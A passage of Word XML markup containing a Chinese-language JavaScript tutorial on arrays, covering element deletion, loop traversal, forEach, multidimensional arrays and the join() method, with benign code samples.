    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1 in a//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>false:</w:t>
      </w:r>
      <w:r>
        <w:t>数组索引</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>并未在数组中定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.length//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>3:delete</w:t>
      </w:r>
      <w:r>
        <w:t>操作并不影响数组长度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>删除数组元素与为其赋</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>值是类似的（但有一些微妙的区</w:t>
      </w:r>
      <w:r>
        <w:t>别）。注意，对一个数组元素使用</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>不会修改数组的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性，也不会将元素从高索引处移下来填充已删除属性留下的空白。如果从数组中删除一个元素，它就变成稀疏数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面我们看到，也可以简单地设置</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性为一个新的期望长度来删除数组尾部的元素。数组有</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（它和</w:t>
      </w:r>
      <w:r>
        <w:t>push()</w:t>
      </w:r>
      <w:r>
        <w:t>一起使用），后者一次使减少长度</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>并返回被删除元素的值。还有一个</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（它和</w:t>
      </w:r>
      <w:r>
        <w:t>unshift()</w:t>
      </w:r>
      <w:r>
        <w:t>一起使用），从数组头部删除一个元素。和</w:t>
      </w:r>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:r>
        <w:t>不同的是</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将所有元素下移到比当前索引低</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的地</w:t>
      </w:r>
      <w:r>
        <w:t>方。</w:t>
      </w:r>
      <w:r>
        <w:t>7.8</w:t>
      </w:r>
      <w:r>
        <w:t>节和第三部分涵盖</w:t>
      </w:r>
      <w:r>
        <w:t>pop()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>shift()</w:t>
      </w:r>
      <w:r>
        <w:t>的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，</w:t>
      </w:r>
      <w:r>
        <w:t>splice()</w:t>
      </w:r>
      <w:r>
        <w:t>是一个通用的方法来插入、删除或替换数组元素。它会根据需要修改</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性并移动元素到更高或较低的索引处。详细内容见</w:t>
      </w:r>
      <w:r>
        <w:t>7.8</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="168" w:name="7_6_Shu_Zu_Bian_Li_"/>
      <w:r>
        <w:t>7.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数组遍历</w:t>
      </w:r>
      <w:bookmarkEnd w:id="168"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.5.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）是遍历数组元素最常见的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var keys=Object.keys(o);//</w:t>
      </w:r>
      <w:r>
        <w:t>获得</w:t>
      </w:r>
      <w:r>
        <w:t>o</w:t>
      </w:r>
      <w:r>
        <w:t>对象属性名组成的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var values=[]//</w:t>
      </w:r>
      <w:r>
        <w:t>在数组中存储匹配属性的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>keys.length;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>对于数组中每个</w:t>
      </w:r>
      <w:r>
        <w:t>索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var key=keys[i];//</w:t>
      </w:r>
      <w:r>
        <w:t>获得索引处的键值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>values[i]=o[key];//</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:t>数组中保存属性值</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在嵌套循环或其他性能非常重要的上下文中，可以看到这种基本的数组遍历需要优化，数组的长度应该只查询一次而非每次循环都要查询：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0,len=keys.length;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>len;i++){//</w:t>
      </w:r>
      <w:r>
        <w:t>循环体仍然不变</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这些例子假设数组是稠密的，并且所有的元素都是合法数据。否则，使用数组元素之前应该先检测它们。如果想要排除</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>和不存在的元素，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!a[i])continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>和不存在的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>循环体</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如果只想跳过</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>和不存的元素，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(a[i]===undefined)continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过</w:t>
      </w:r>
      <w:r>
        <w:t>un</w:t>
      </w:r>
      <w:r>
        <w:t>defined+</w:t>
      </w:r>
      <w:r>
        <w:t>不存在的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>循环体</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最后，如果只想跳过不存在的元素而仍然要处理存在的</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>元素，代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>a.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!(i in a))continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过不存在的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>循环体</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还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/i n</w:t>
      </w:r>
      <w:r>
        <w:t>循环（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.5.4</w:t>
      </w:r>
      <w:r>
        <w:t>节）处理稀疏数组。循环每次将一个可枚举的属性名（包括数组索引）赋值给循环变量。不存在的索引将不会遍历到：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var index in sparseArray){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var value=sp</w:t>
      </w:r>
      <w:r>
        <w:t>arseArray[index];//</w:t>
      </w:r>
      <w:r>
        <w:t>此处可以使用索引和值做一些事情</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w:t>
      </w:r>
      <w:r>
        <w:t>6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节已经注意到</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环能够枚举继承的属性名，如添加到</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中的方法。由于这个原因，在数组上不应该使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环，除非使用额外的检测方法来过滤不想要的属性。如下检测代码取其一即可：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i in a){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!a.hasOwnProperty(i))continue;//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过继承的属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>循环体</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i in a){//</w:t>
      </w:r>
      <w:r>
        <w:t>跳过不是非负整数的</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(String(Math.floor(Math.abs(Number(i))))!==i)continue;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ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>规范允许</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>循环以不同的顺序遍历对象的属性。通常数组元素的遍历实现是升序的，但不能保证一定是这样的。特别地，如果数组同时拥有对象属性和数组元素，返回的属性名很可能是按照创建的顺序而非数值的大小顺序。如何处理这个问题的实现各不相同，如果算法依赖于遍历的顺序，那么最好不要使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>而用常规的</w:t>
      </w:r>
      <w:r>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:t>循环。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了一些遍历数组元素的新方法，</w:t>
      </w:r>
      <w:r>
        <w:t>按照索引的顺序按个传递给定义的一个函数。这些方法中最常用的就是</w:t>
      </w:r>
      <w:r>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=[1,2,3,4,5];//</w:t>
      </w:r>
      <w:r>
        <w:t>这是需要遍历的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sumOfSquares=0;//</w:t>
      </w:r>
      <w:r>
        <w:t>要得到数据的平方和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>data.forEach(function(x){//</w:t>
      </w:r>
      <w:r>
        <w:t>把每个元素传递给此函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sumOfSquares+=x*x;//</w:t>
      </w:r>
      <w:r>
        <w:t>平方相加</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>sumOfSquares//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>55:1+4+9+16+25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>forEach()</w:t>
      </w:r>
      <w:r>
        <w:t>和相关的遍历方法使得数组拥有简单而强大的函数式编程风格。它们涵盖在</w:t>
      </w:r>
      <w:r>
        <w:t>7.9</w:t>
      </w:r>
      <w:r>
        <w:t>节中</w:t>
      </w:r>
      <w:r>
        <w:t>，当涉及函数式编程时，还将在</w:t>
      </w:r>
      <w:r>
        <w:t>8.8</w:t>
      </w:r>
      <w:r>
        <w:t>节再次碰到它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="169" w:name="7_7_Duo_Wei_Shu_Zu_"/>
      <w:r>
        <w:t>7.7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　多维数组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="169"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>不支持真正的多维数组，但可以用数组的数组来近似。访问数组的数组中的元素，只要简单地使用两次</w:t>
      </w:r>
      <w:r>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t>操作符即可。例如，假设变量</w:t>
      </w:r>
      <w:r>
        <w:t>matrix</w:t>
      </w:r>
      <w:r>
        <w:t>是一个数组的数组，它的基本元素是数值，那么</w:t>
      </w:r>
      <w:r>
        <w:t>matrix[x]</w:t>
      </w:r>
      <w:r>
        <w:t>的每个元素是包含一个数值数组，访问数组中特定数值的代码为</w:t>
      </w:r>
      <w:r>
        <w:t>matrix[x][y]</w:t>
      </w:r>
      <w:r>
        <w:t>。这里有一个具体的例子，它使用二维数组作为一个九九乘法表：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个多维数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var table=new Array(10);//</w:t>
      </w:r>
      <w:r>
        <w:t>表格有</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>table.length;i++)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>table[i]=new Array(10);//</w:t>
      </w:r>
      <w:r>
        <w:t>每行有</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>列</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>初始化数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var row=0;row</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>table.length;row++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(col=0;col</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>table[row].length;col++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>table[row][col]=row*col;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>使用多维数组来计算（查询）</w:t>
      </w:r>
      <w:r>
        <w:t>5*7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var product=table[5][7];//35</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="170" w:name="7_8_Shu_Zu_Fang_Fa_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　数组方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="170"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ECMAScript </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中定义了一些很有用的操作数组的函数，这意味着这些函数作为任何数组的方法都是可用的。下面几节介绍</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中的这些方法。像通常一样，完整的细节参见第四部分关于数组的内容。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中新增了一些新的数组遍历方法；它们涵盖在</w:t>
      </w:r>
      <w:r>
        <w:t>7.9</w:t>
      </w:r>
      <w:r>
        <w:t>节中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="171" w:name="7_8_1_join__"/>
      <w:r>
        <w:t>7.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>join()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="171"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Array.join()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将数组中所有元素都转化为字符串并连接在一起，返回最后生成的字符串。可以指定一个可选的字符串在生成的字符串中来分隔数组的各个元素。如果不指定分隔符，默认使用逗号。如以</w:t>
      </w:r>
      <w:r>
        <w:t>下代码所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[1,2,3];//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个包含三个元素的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.join();//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"1,2,3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>a.join("");//=</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>"1 2 3"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
